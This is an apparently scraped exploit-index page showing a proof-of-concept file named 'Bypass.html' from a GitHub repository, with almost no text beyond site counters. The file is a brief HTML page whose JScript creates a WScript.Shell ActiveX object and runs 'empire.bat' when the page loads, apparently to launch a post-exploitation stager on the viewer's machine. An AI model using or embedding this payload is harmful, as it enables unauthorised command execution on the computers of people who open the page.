4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / Bypass.html HTML
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>